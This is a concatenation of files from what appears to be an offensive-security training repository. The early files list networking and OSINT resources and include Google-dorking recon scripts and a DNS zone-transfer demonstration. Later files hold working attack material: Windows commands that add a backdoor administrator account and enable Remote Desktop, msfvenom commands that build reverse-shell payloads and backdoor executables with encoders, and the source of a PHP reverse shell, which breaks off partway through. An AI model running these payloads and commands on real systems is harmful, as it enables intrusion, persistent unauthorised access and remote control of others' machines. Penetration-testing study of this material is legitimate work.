# Basic Networking Resources The following are some good basic networking resources to get you started. ## TCP/IP Protocols **Note**: Links without description are official RFCs from the Internet Engineering Task Force (IETF). * [Address Resolution Protocol (ARP)](https://datatracker.ietf.org/doc/rfc826/) * [Border Gateway Protocol (BGP)](https://datatracker.ietf.org/doc/rfc4271/) * [Domain Name System (DNS)](https://datatracker.ietf.org/doc/rfc1035/) * [Dynamic Host Configuration Protocol (DHCP)](https://datatracker.ietf.org/doc/rfc2131/) * [File Transfer Protocol (FTP)](https://datatracker.ietf.org/doc/rfc959/) * [Hypertext Transfer Protocol (HTTP/1.1)](https://datatracker.ietf.org/doc/rfc2616/) * [Hypertext Transfer Protocol Version 2 (HTTP/2)](https://datatracker.ietf.org/doc/rfc7540/) * [Internet Protocol Version 4 (IPv4)](https://tools.ietf.org/html/rfc791/) * [Internet Protocol Version 6 (IPv6)](https://datatracker.ietf.org/doc/rfc2460/) * [Network Address Translator (NAT)](https://datatracker.ietf.org/doc/rfc1631/) * [Simple Mail Transfer Protocol (SMTP)](https://datatracker.ietf.org/doc/rfc5321/) * [Simple Network Management Protocol (SNMP)](https://datatracker.ietf.org/doc/rfc1157/) * [Secure Shell (SSH)](https://datatracker.ietf.org/doc/rfc4251/) * [Transmission Control Protocol (TCP)](https://datatracker.ietf.org/doc/rfc793/) * [Telnet](https://datatracker.ietf.org/doc/rfc854/) * [User Datagram Protocol (UDP)](https://datatracker.ietf.org/doc/rfc768/) ## Courses and YouTube Videos * [Cisco Networking Academy Courses](https://www.netacad.com/courses/networking) - A various networking courses (Essentials, CCNA, CCNP, etc.). * [Network Chuck OSI Model](https://www.youtube.com/watch?v=oIRkXulqJA4) * [Network Chuck Subnetting Playlist](https://www.youtube.com/watch?v=5WfiTHiU4x8&list=PLIhvC56v63IKrRHh3gvZZBAGvsvOhwrRF) ## Tutorials * [Networking](https://www.youtube.com/watch?v=rL8RSFQG8do&list=PLF360ED1082F6F2A5) - A series of YouTube tutorials about networking by Eli the Computer Guy. * [Wireshark Tutorial for Beginners](https://www.youtube.com/watch?v=flDzURAm8wQ&list=PL6gx4Cwl9DGBI2ZFuyZOl5Q7sptR7PwYN) - TheNewBoston Wireshark Tutorial for Beginners. * [MikroTik WinBox Manual](https://wiki.mikrotik.com/wiki/Manual:Winbox) - The official manual for MikroTik's WinBox software. ## Books * [Cisco Press](https://www.ciscopress.com/) - Cisco authorized book publisher where you can get all books and official guides for Cisco certifications. * [Practical Packet Analysis (3rd Edition)](https://nostarch.com/packetanalysis3) - An amazing book about analyzing network packets using Wireshark. * [Attacking Network Protocols](https://nostarch.com/networkprotocols) - A Hacker's Guide to Capture, Analysis, and Exploitation by James Forshaw. * [Automate Your Network: Introducing the Modern Approach to Enterprise Network Management](https://www.amazon.com/Automate-Your-Network-Introducing-Enterprise/dp/1799237885) - Probably one of the best books for network automation by John W. Capobianco. ## Software and Tools ### Online tools * [Online nslookup](https://www.nslookup.io) - An online DNS client to view and debug DNS configuration. * [Online whois](https://whois.domaintools.com/) - An online whois record tool for getting information about domains. * [OUI Lookup Tool](https://www.wireshark.org/tools/oui-lookup.html) - An online OUI lookup for searching vendors of MAC addresses. * [MXToolbox](https://mxtoolbox.com/) - A large number of various tools (DNS lookup, MX lookup, Whois, SPF lookup, and more). ### Packet capture and analysis **CHECKOUT THE Hacking Scenarios:** https://hackingscenarios.com * [Wireshark](https://www.wireshark.org/) - The most popular free and open source network protocol analyzer. * [Tshark](https://tshark.dev/) - A CLI version of Wireshark. * [tcpdump](http://www.tcpdump.org/) - A powerful open source command-line packet analyzer. * [NetworkMiner](https://www.netresec.com/?page=NetworkMiner) - A network forensic tool for PCAP file analysis. * [Malware-Traffic-Analysis.net](https://malware-traffic-analysis.net/) - A large collection of malicious PCAP files that can be used to practice packet capture skills. * [Publicly Available PCAP files](https://www.netresec.com/?page=PcapFiles) - A list of publicly available PCAP files for additional training. ### Network simulators and emulators * [GNS3](https://gns3.com/) - A powerful free and open source network simulator. * [Cisco Packet Tracer](https://www.netacad.com/courses/packet-tracer) - Cross-platform network visual simulation tool designed by Cisco Systems. * [EVE-NG](https://www.eve-ng.net/) - A powerful network simulator. Both Community and Professional editions are available. * [Cisco Modeling Labs](https://www.cisco.com/c/en/us/products/cloud-systems-management/modeling-labs/index.html) - An online platform that helps network engineers simulate the behavior of Cisco routers, switches, and access points. It is intended for customers from enterprise backgrounds. * [Cisco Virtual Internet Routing Lab (VIRL)](https://learningnetwork.cisco.com/s/virl) - It is a Cisco IOS-based comprehensive network simulation environment. It is intended for all individuals and trainees. ### Firewalls and switches * [pfSense](https://www.pfsense.org/) - An open source firewall/router computer software distribution based on FreeBSD. * [OPNsense](https://opnsense.org/) - OPNsense is an open source, easy-to-use, and easy-to-build FreeBSD based firewall and routing platform. * [Open vSwitch](https://www.openvswitch.org/) - Open vSwitch is a production quality, multilayer virtual switch licensed under the open source Apache 2.0 license. ### Remote access and sharing tools * [Remmina](https://remmina.org/) - An open source remote access tool. It supports RDP, SSH, VNC, and other protocols for remote access. * [PuTTY](https://www.putty.org/) - One of the most popular SSH and Telnet clients for Windows. * [FileZilla](https://filezilla-project.org/) - An open source tool for file transfer. Support FTP, FTPS and SFTP protocols. * [WinSCP](https://winscp.net/eng/index.php) - A popular SFTP client and FTP client for Windows. * [SecureCRT](https://www.vandyke.com/products/securecrt/) - A commercial SSH and Telnet client and terminal emulator by VanDyke Software. * [WinBox](https://mikrotik.com/download) - Official MikroTik GUI software for administration of MikroTik RouterOS. ### Other tools * [Nmap](https://nmap.org/) - A free and open source software for network discovery and security auditing. * [Zenmap](https://nmap.org/zenmap/) - The official Nmap Security Scanner GUI. * [Draw.io](https://github.com/jgraph/drawio-desktop) - An open source software for creating network diagrams and topologies. ## Certifications * [Cisco certifications](https://www.cisco.com/c/en/us/training-events/training-certifications/certifications.html)
Markdown
h4cker/osint/dns-zone-transfer.md
# DNS Zone Transfer [Digi.ninja](https://digi.ninja/projects/zonetransferme.php) has an amazing explanation of DNS zone transfer attacks and resource for you to practice this in a safe environment. The domain available to practice is `zonetransfer.me` and the two name servers are `nsztm1.digi.ninja` and `nsztm2.digi.ninja`. ``` # dig axfr @nsztm1.digi.ninja zonetransfer.me ; <<>> DiG 9.9.5-3ubuntu0.6-Ubuntu <<>> axfr @nsztm1.digi.ninja zonetransfer.me ; (1 server found) ;; global options: +cmd zonetransfer.me. 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2014101601 172800 900 1209600 3600 zonetransfer.me. 300 IN HINFO "Casio fx-700G" "Windows XP" zonetransfer.me. 301 IN TXT "google-site-verification=tyP28J7JAUHA9fw2sHXMgcCC0I6XBmmoVi04VlMewxA" zonetransfer.me. 7200 IN MX 0 ASPMX.L.GOOGLE.COM. zonetransfer.me. 7200 IN MX 10 ALT1.ASPMX.L.GOOGLE.COM. zonetransfer.me. 7200 IN MX 10 ALT2.ASPMX.L.GOOGLE.COM. zonetransfer.me. 7200 IN MX 20 ASPMX2.GOOGLEMAIL.COM. zonetransfer.me. 7200 IN MX 20 ASPMX3.GOOGLEMAIL.COM. zonetransfer.me. 7200 IN MX 20 ASPMX4.GOOGLEMAIL.COM. zonetransfer.me. 7200 IN MX 20 ASPMX5.GOOGLEMAIL.COM. zonetransfer.me. 7200 IN A 217.147.180.162 zonetransfer.me. 7200 IN NS nsztm1.digi.ninja. zonetransfer.me. 7200 IN NS nsztm2.digi.ninja. _sip._tcp.zonetransfer.me. 14000 IN SRV 0 0 5060 www.zonetransfer.me. 164.180.147.217.IN-ADDR.ARPA.zonetransfer.me. 7200 IN PTR www.zonetransfer.me. asfdbauthdns.zonetransfer.me. 7900 IN AFSDB 1 asfdbbox.zonetransfer.me. asfdbbox.zonetransfer.me. 7200 IN A 127.0.0.1 asfdbvolume.zonetransfer.me. 7800 IN AFSDB 1 asfdbbox.zonetransfer.me. canberra-office.zonetransfer.me. 7200 IN A 202.14.81.230 cmdexec.zonetransfer.me. 300 IN TXT "\; ls" contact.zonetransfer.me. 2592000 IN TXT "Remember to call or email Pippa on +44 123 4567890 or pippa@zonetransfer.me when making DNS changes" dc-office.zonetransfer.me. 7200 IN A 143.228.181.132 deadbeef.zonetransfer.me. 7201 IN AAAA dead:beaf:: dr.zonetransfer.me. 300 IN LOC 53 20 56.558 N 1 38 33.526 W 0.00m 1m 10000m 10m DZC.zonetransfer.me. 7200 IN TXT "AbCdEfG" email.zonetransfer.me. 2222 IN NAPTR 1 1 "P" "E2U+email" "" email.zonetransfer.me.zonetransfer.me. email.zonetransfer.me. 7200 IN A 74.125.206.26 Info.zonetransfer.me. 7200 IN TXT "ZoneTransfer.me service provided by Robin Wood - robin@digi.ninja. See http://digi.ninja/projects/zonetransferme.php for more information." internal.zonetransfer.me. 300 IN NS intns1.zonetransfer.me. internal.zonetransfer.me. 300 IN NS intns2.zonetransfer.me. intns1.zonetransfer.me. 300 IN A 167.88.42.94 intns2.zonetransfer.me. 300 IN A 167.88.42.94 office.zonetransfer.me. 7200 IN A 4.23.39.254 ipv6actnow.org.zonetransfer.me. 7200 IN AAAA 2001:67c:2e8:11::c100:1332 owa.zonetransfer.me. 7200 IN A 207.46.197.32 robinwood.zonetransfer.me. 302 IN TXT "Robin Wood" rp.zonetransfer.me. 321 IN RP robin.zonetransfer.me. robinwood.zonetransfer.me. sip.zonetransfer.me. 3333 IN NAPTR 2 3 "P" "E2U+sip" "!^.*$!sip:customer-service@zonetransfer.me!" . sqli.zonetransfer.me. 300 IN TXT "' or 1=1 --" sshock.zonetransfer.me. 7200 IN TXT "() { :]}\; echo ShellShocked" staging.zonetransfer.me. 7200 IN CNAME www.sydneyoperahouse.com. alltcpportsopen.firewall.test.zonetransfer.me. 301 IN A 127.0.0.1 testing.zonetransfer.me. 301 IN CNAME www.zonetransfer.me. vpn.zonetransfer.me. 4000 IN A 174.36.59.154 www.zonetransfer.me. 7200 IN A 217.147.180.162 xss.zonetransfer.me. 300 IN TXT "'><script>alert('Boo')</script>" zonetransfer.me. 7200 IN SOA nsztm1.digi.ninja. robin.digi.ninja. 2014101601 172800 900 1209600 3600 ;; Query time: 21 msec ;; SERVER: 81.4.108.41#53(81.4.108.41) ;; WHEN: Fri Feb 05 08:58:44 GMT 2016 ;; XFR size: 47 records (messages 1, bytes 1846) ```
Markdown
h4cker/osint/README.md
# Open-source Intelligence (OSINT) Open-source intelligence (OSINT) is data collected from open source and publicly available sources. The following are a few OSINT resources and references: ## Passive Recon Tools: - [AMass](https://github.com/OWASP/Amass) - [Deepinfo (commercial tool)](https://deepinfo.com) - [Exiftool](https://www.sno.phy.queensu.ca/~phil/exiftool/) - [ExtractMetadata](http://www.extractmetadata.com) - [Findsubdomains](https://findsubdomains.com/) - [FOCA](https://elevenpaths.com) - [IntelTechniques](https://inteltechniques.com) - [Maltego](https://www.paterva.com/web7/) - [Recon-NG](https://github.com/lanmaster53/recon-ng) - [Scrapy](https://scrapy.org) - [Screaming Frog](https://www.screamingfrog.co.uk) - [Shodan](https://shodan.io) - [SpiderFoot](http://spiderfoot.net) - [theHarvester](https://github.com/laramies/theHarvester) - [Visual SEO Studio](https://visual-seo.com/) - [Web Data Extractor](http://www.webextractor.com) - [Xenu](http://home.snafu.de) - [ParamSpider](https://github.com/devanshbatham/ParamSpider) ## Open Source Threat Intelligence - [Awesome Threat Intelligence](https://github.com/santosomar/awesome-threat-intelligence) - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it. ## OSINT Source Highlights | Website | Description | |---------------------|--------------------| | shodan.io | Server | | google.com | Dorks | | wigle.net | WiFi Networks | | grep.app | Codes Search | | app.binaryedge | Threat Intelligence| | onyphe.io | Server | | viz.greynoise.io | Threat Intelligence| | censys.io | Server | | hunter.io | Email Addresses | | fofa.info | Threat Intelligence| | zoomeye.org | Threat Intelligence| | leakix.net | Threat Intelligence| | intelx.io | OSINT | | app.netlas.io | Attack Surface | | searchcode.com | Codes Search | | urlscan.io | Threat Intelligence| | publicwww.com | Codes Search | | fullhunt.io | Attack Surface | | socradar.io | Threat Intelligence| | binaryedge.io | Attack Surface | | ivre.rocks | Server | | crt.sh | Certificate Search| | vulners.com | Vulnerabilities | | pulsedive.com | Threat Intelligence| ### Website Exploration and "Google Hacking" - censys : https://censys.io - Certficate Search: https://crt.sh/ - ExifTool: https://www.sno.phy.queensu.ca/~phil/exiftool - Google Hacking Database (GHDB): https://www.exploit-db.com/google-hacking-database - Google Transparency Report: https://transparencyreport.google.com/https/certificates - Huge TLS/SSL certificate DB with advanced search: https://certdb.com - netcraft: https://searchdns.netcraft.com - SiteDigger: http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx - Spyse: https://spyse.com ### Data Breach Query Tools - BaseQuery: https://github.com/g666gle/BaseQuery - Buster: https://github.com/sham00n/buster - h8mail: https://github.com/khast3x/h8mail - LeakLooker: https://github.com/woj-ciech/LeakLooker - PwnDB: https://github.com/davidtavarez/pwndb - Scavenger: https://github.com/rndinfosecguy/Scavenger - WhatBreach: https://github.com/Ekultek/WhatBreach ### IP address and DNS Lookup Tools - [bgp](https://bgp.he.net/) - [Bgpview](https://bgpview.io/) - [DataSploit (IP Address Modules)](https://github.com/DataSploit/datasploit/tree/master/ip) - [Domain Dossier](https://centralops.net/co/domaindossier.aspx) - [Domaintoipconverter](http://domaintoipconverter.com/) - [Googleapps Dig](https://toolbox.googleapps.com/apps/dig/) - [Hurricane Electric BGP Toolkit](https://bgp.he.net/) - [ICANN Whois](https://whois.icann.org/en) - [Massdns](https://github.com/blechschmidt/massdns) - [Mxtoolbox](https://mxtoolbox.com/BulkLookup.aspx) - [Ultratools ipv6Info](https://www.ultratools.com/tools/ipv6Info) - [Viewdns](https://viewdns.info/) - [Umbrella (OpenDNS) Popularity List](http://s3-us-west-1.amazonaws.com/umbrella-static/index.html) ### Social Media * [A tool to scrape LinkedIn](https://github.com/dchrastil/TTSL) * [cree.py](https://github.com/ilektrojohn/creepy) ### Acquisitions and - [OCCRP Aleph](https://aleph.occrp.org/) - The global archive of research material for investigative reporting. ### Whois WHOIS information is based upon a tree hierarchy. ICANN (IANA) is the authoritative registry for all of the TLDs and is a great starting point for all manual WHOIS queries. - ICANN: http://www.icann.org - IANA: http://www.iana.com - NRO: http://www.nro.net - AFRINIC: http://www.afrinic.net - APNIC: http://www.apnic.net - ARIN: http://ws.arin.net - LACNIC: http://www.lacnic.net - RIPE: http://www.ripe.net ### BGP looking glasses - BGP4: http://www.bgp4.as/looking-glasses - BPG6: http://lg.he.net/ ### DNS - dnsenum - https://code.google.com/p/dnsenum - dnsmap: https://code.google.com/p/dnsmap - dnsrecon: https://www.darkoperator.com/tools-and-scripts - dnstracer: https://www.mavetju.org/unix/dnstracer.php - dnswalk: https://sourceforge.net/projects/dnswalk ## The OSINT Framework - [OSINT Framework](https://osintframework.com) ## Dark Web OSINT Tools ### Dark Web Search Engine Tools - [Ahmia Search Engine](https://ahmia.fi) and [their GitHub repo](https://github.com/ahmia/ahmia-site) - [DarkSearch](https://darksearch.io) and their [GitHub repo](https://github.com/thehappydinoa/DarkSearch) - [Katana](https://github.com/adnane-X-tebbaa/Katana) - [OnionSearch](https://github.com/megadose/OnionSearch) - [Search Engines for Academic Research](https://www.itseducation.asia/deep-web.htm) - [DarkDump](https://github.com/josh0xA/darkdump) ### Tools to Obtain Information of .onion Links - [H-Indexer](http://jncyepk6zbnosf4p.onion/onions.html) - [Hunchly](https://www.hunch.ly/darkweb-osint) - [Tor66 Fresh Onions](http://tor66sewebgixwhcqfnp5inzp5x5uohhdy3kvtnyfxc2e5mxiuh34iid.onion/fresh) ### Tools to scan onion links - [Onioff](https://github.com/k4m4/onioff) - [Onion-nmap](https://github.com/milesrichardson/docker-onion-nmap) - [Onionscan](https://github.com/s-rah/onionscan) ### Tools to Crawl Dark Web Data - [TorBot](https://github.com/DedSecInside/TorBot) - [TorCrawl](https://github.com/MikeMeliz/TorCrawl.py) - [OnionIngestor](https://github.com/danieleperera/OnionIngestor) ### Other Great Intelligence Gathering Sources and Tools - Resources from Pentest-standard.org - http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#Intelligence_Gathering ### Active Recon - Tons of references to scanners and vulnerability management software for active reconnaissance - http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#Vulnerability_Analysis
Text
h4cker/osint/quick_recon/alpha.txt
Current Micro Plugins : [>] Subdomains...[UP] [>] Sub-Subdomains...[UP] [>] Signup/Login pages...[UP] [>] Dir Listing...[UP] [>] Exposed Docs...[UP] [>] WordPress Entries...[UP] [>] Pasting Sites...[UP]
Python
h4cker/osint/quick_recon/quick_recon.py
#!/usr/bin/env python3 # A script to perform a quick OSINT recon for a given domains # This is an example and work in progress import os , sys , time , requests , random from googlesearch import search from termcolor import colored, cprint from http import cookiejar from urllib.parse import urlparse from plugins import pasting Subdomains = [] def SubdomainFilter(URL): Parsed = urlparse(URL); Scheme = Parsed.scheme; Host = Parsed.netloc; URL = Scheme + "://" + Host + "/" if URL not in Subdomains: print(URL); Subdomains.append(URL) if os.path.exists("alpha.txt"): print("") Qupdate = requests.get('https://raw.githubusercontent.com/The-Art-of-Hacking/h4cker/osint/quick_recon/qrecon_update.txt') #Quantom Qupdate.status_code if Qupdate.status_code == 200: print(colored ('Cheking Update...' ,'white')) print(colored(Qupdate.text , 'green')) time.sleep(3) # elif Qupdate.status_code == 404: print(colored ('Cheking Update...' ,'white')) print(colored ('Update Available ' ,'red')) print(colored ('See https://github.com/The-Art-of-Hacking/h4cker/tree/master/osint' ,'red')) print(colored ('Resuming...' ,'red')) print("") time.sleep(3) # f = open('alpha.txt', 'r') alpha = f.read() print(colored (alpha,'yellow')) else: print("") print(colored ('Please Run the quick_recon Script in the Main Directory' ,'red')) print(colored ('First: cd quick_recon ' ,'red')) print(colored ('Then : python3 quick_recon.py' ,'red')) print(colored ('Exiting...' ,'red')) time.sleep(5) exit() banner1 = """ Quick OSINT Recon of a given domain ̿з=(◕_◕)=ε """ print (banner1) #--------------------------------------------------------------------------------# class BlockAll(cookiejar.CookiePolicy): return_ok = set_ok = domain_return_ok = path_return_ok = lambda self, *args, **kwargs: False netscape = True rfc2965 = hide_cookie2 = False TLD = ["com","com.tw","co.in"] beta = random.choice(TLD) s = requests.Session() s.cookies.set_policy(BlockAll()) #--------------------------------------------------------------------------------# key = input (colored('[+] Set Target (site.com) : ', 'white' ))#Key file = open("quick_recon.config", "w") file.write(key) file.close() #V2 #V2 print("") print(colored ('[>] Looking For Subdomains...' ,'green')) query = "site:" + key + " -www." + key #SubTech1 for gamma in search(query, tld=beta, num=30 , stop=60 , pause=2): SubdomainFilter(URL=gamma) query = "site:*." + key #SubTech2 for gamma in search(query, tld=beta, num=30 , stop=60 , pause=2): SubdomainFilter(URL=gamma) print("") if os.path.exists(".google-cookie"): os.remove(".google-cookie") print(colored ('[>] Looking For Sub-Subdomains...' ,'green')) query = "site:*.*." + key for gamma in search(query, tld=beta, num=30 , stop=60 , pause=2): SubdomainFilter(URL=gamma) print("") if os.path.exists(".google-cookie"): os.remove(".google-cookie") print(colored ('[>] Looking For Login/Signup Pages...' ,'green')) query = "inurl:login site:" + key #LogTech1 for gamma in search(query, tld=beta, num=30 , stop=60 , pause=2): print("" + gamma) query = "site:" + key + " inurl:signup | inurl:register | intitle:Signup" #LogTech2 for gamma in search(query, tld=beta, num=30 , stop=60 , pause=2): print("" + gamma) print ("") if os.path.exists(".google-cookie"): os.remove(".google-cookie") # Sleeping for 60s to Avoid Google Block print(colored ('[!] 20s Sleep to avoid Google Block' ,'yellow')) time.sleep(21) # ; ) print(colored ('[!] Switching Google TLDs...' ,'yellow')) TLD = ["co.ma","dz","ru","ca"] zolo = random.choice(TLD) print("") #ok print(colored ('[>] Looking For Directory Listing...' ,'green')) #DirListing query = "site:" + key + " intitle:index of" for gamma in search(query, tld=zolo, num=10 , stop=60 , pause=2): print("" + gamma) print ("") if os.path.exists(".google-cookie"): os.remove(".google-cookie") print(colored ('[>] Looking For Public Exposed Documents...' ,'green')) #Docs query = "site:" + key + " ext:doc | ext:docx | ext:odt | ext:pdf | ext:rtf | ext:sxw | ext:psw | ext:ppt | ext:pptx | ext:pps | ext:csv" for gamma in search(query, tld=zolo, num=30 , stop=60 , pause=2): print("" + gamma) print ("") if os.path.exists(".google-cookie"): os.remove(".google-cookie") print(colored ('[>] Looking For WordPress Entries...' ,'green')) #WP query = "site:" + key + " inurl:wp- | inurl:wp-content | inurl:plugins | inurl:uploads | inurl:themes | inurl:download" for gamma in search(query, tld=zolo, num=30 , stop=60 , pause=2): print("" + gamma) print ("") if os.path.exists(".google-cookie"): os.remove(".google-cookie")
Python
h4cker/osint/quick_recon/quick_recon_cli.py
#quick_recon_Cli #Coded by Adnane X Tebbaa #Github : https://www.github.com/adnane-x-tebbaa/quick_recon #Twitter : @TebbaaX import os import sys import time import requests import random from googlesearch import search from termcolor import colored, cprint from http import cookiejar TLD = ["com","ru","com.hk"] beta = random.choice(TLD) s = requests.Session() print("") key = input (colored('[+] Set Query : ', 'white' )) print("") print(colored ('[>] Running...' ,'green')) query = key for gamma in search(query, tld=beta, num=30 , stop=90 , pause=2): print("" + gamma)
Python
h4cker/osint/quick_recon/plugins/pasting.py
#!/usr/bin/env python3 # A script to perform a quick OSINT recon for a given domains # This is an example and work in progress import os import sys import time import requests import random from googlesearch import search from termcolor import colored, cprint from http import cookiejar TLD = ["co.ma","dz","ru","ca"] zolo = random.choice(TLD) X = requests.get('https://www.google.com/webhp?ei=1') # : / X.status_code if X.status_code == 200: time.sleep(5) f = open('quick_recon.config', 'r') alpha = f.read() key = alpha time.sleep(5) print(colored ('[>] Looking in Pasting Sites...' ,'green')) #Pasting Sites e.g : PasteBin... query = "site:pastebin.com | site:hastebin.com | site:carbon.now.sh " + key for gamma in search(query, tld=zolo, num=30 , stop=60 , pause=2): print("" + gamma) print ("") if os.path.exists(".google-cookie"): os.remove(".google-cookie") os.remove("quick_recon.config") print(colored ('[>] Done...Happy Hunting' ,'green'))
Markdown
h4cker/pcaps/README.md
# List of Interesting Packet Capture (.pcap) Files - https://www.malware-traffic-analysis.net/ - https://digitalcorpora.org/corpora/network-packet-dumps - https://www.netresec.com/?page=PcapFiles - https://www.netresec.com/?page=MACCDC - https://github.com/zeek/zeek/tree/master/testing/btest/Traces - https://www.ll.mit.edu/r-d/datasets/2000-darpa-intrusion-detection-scenario-specific-datasets - https://wiki.wireshark.org/SampleCaptures - https://www.stratosphereips.org/datasets-overview - https://ee.lbl.gov/anonymized-traces.html - https://redmine.openinfosecfoundation.org/projects/suricata/wiki/Public_Data_Sets - https://forensicscontest.com/puzzles - https://github.com/markofu/hackeire/tree/master/2011/pcap - https://www.defcon.org/html/links/dc-ctf.html - https://archive.wrccdc.org/ - https://github.com/chrissanders/packets
Markdown
h4cker/pen_testing_reports/README.md
# Public Pen Testing Reports The following are several resources that are useful when writing penetration testing reports, including many different examples: | Resource | URL | ------------- |-------------| |Curated List of penetration testing reports | https://github.com/santosomar/public-pentesting-reports (forked from https://github.com/juliocesarfort/public-pentesting-reports) | | SANS guidance on writing penetration testing reports | https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 | | Offensive Security example |https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf | | PCI Security report guidance | https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf | | Dradis Framework | https://dradisframework.com/ce/ |
Markdown
h4cker/post_exploitation/misc-windows-post-exploitation.md
# Misc Windows Post Exploitation Tasks ### Adding a Windows User (joker): ``` net user /add joker password123 ``` ### Adding a user to the Administrators groups ``` net localgroup administrators /add joker ``` ### Adding a user to the Remote Desktop user group ``` net localgroup "Remote Desktop users" hacker /add ``` ### Starting the Remote Desktop service ``` net start TermService ``` ### Verifying if the Remote Desktop Service is active and running ``` tasklist /svc | findstr /C:TermService ``` ### Permanently enable Terminal Services ``` sc config TermService start=auto ``` ### Enabling Terminal services via the registry Note: You need to reboot after invoking this... ``` reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ```
Markdown
h4cker/post_exploitation/msfvenom.md
# MSFVenom MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode. ## Creating Binaries The following create different binaries for meterpreter and reverse TCP shells: ### Creates a Reverse TCP Meterpreter Shell - Payload for Windows ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe ``` ### Creates a simple HTTP Payload for Windows ``` msfvenom -p windows/meterpreter/reverse_http LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe ``` ### Creates a simple TCP Shell for Linux ``` msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f elf > payload.elf ``` ### Creates a simple TCP Shell for Mac ``` msfvenom -p osx/x86/shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f macho > example.macho ``` ### Creates a simple TCP Payload for Android ``` msfvenom -p android/meterpreter/reverse/tcp LHOST={HOST/IP} LPORT={PORT} R > example.apk ``` ## Web Payloads ### Creates a Simple TCP Shell for PHP ``` msfvenom -p php/meterpreter_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.php ``` ### Creates a Simple TCP Shell for ASP ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f asp > example.asp ``` ### Creates a Simple TCP Shell for Javascrip ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.jsp ``` ### Creates a Simple TCP Shell for WAR ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f war > example.war ``` ## Windows Payloads ### Lists all avalaible encoder ``` msfvenom -l encoders ``` ### Binds an exe with a Payload (Backdoors an exe) ``` msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > example.exe ``` ### Creates a simple TCP payload with shikata_ga_nai encoder ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe ``` ### Binds an exe with a Payload and encodes it ``` msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe ``` ## Getting a Metepreter Shell ``` omar@ares:~$ sudo msfconsole msf > use exploit/multi/handler msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 192.168.1.123 lhost => 192.168.1.123 msf exploit(multi/handler) > set lport 4444 lport => 4444 msf exploit(multi/handler) > run ```
PHP
h4cker/post_exploitation/php-reverse-shell.php
<?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. The author accepts no liability // for damage caused by this tool. If these terms are not acceptable to you, then // do not use this tool. // // In all other respects the GPL version 2 applies: // // This program is free software; you can redistribute it and/or modify // it under the terms of the GNU General Public License version 2 as // published by the Free Software Foundation. // // This program is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License along // with this program; if not, write to the Free Software Foundation, Inc., // 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. // // This tool may be used for legal purposes only. Users take full responsibility // for any actions performed using this tool. If these terms are not acceptable to // you, then do not use this tool. // // You are encouraged to send comments, improvements or suggestions to // me at pentestmonkey@pentestmonkey.net // // Description // ----------- // This script will make an outbound TCP connection to a hardcoded IP and port. // The recipient will be given a shell running as the current user (apache normally). // // Limitations // ----------- // proc_open and stream_set_blocking require PHP version 4.3+, or 5+ // Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows. // Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available. // // Usage // ----- // See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck. set_time_limit (0); $VERSION = "1.0"; $ip = '127.0.0.1'; // CHANGE THIS $port = 1234; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); // Parent exits } // Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); } // Change to a safe directory chdir("/"); // Remove any umask we inherited umask(0); // // Do the reverse shell... // // Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } // Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); 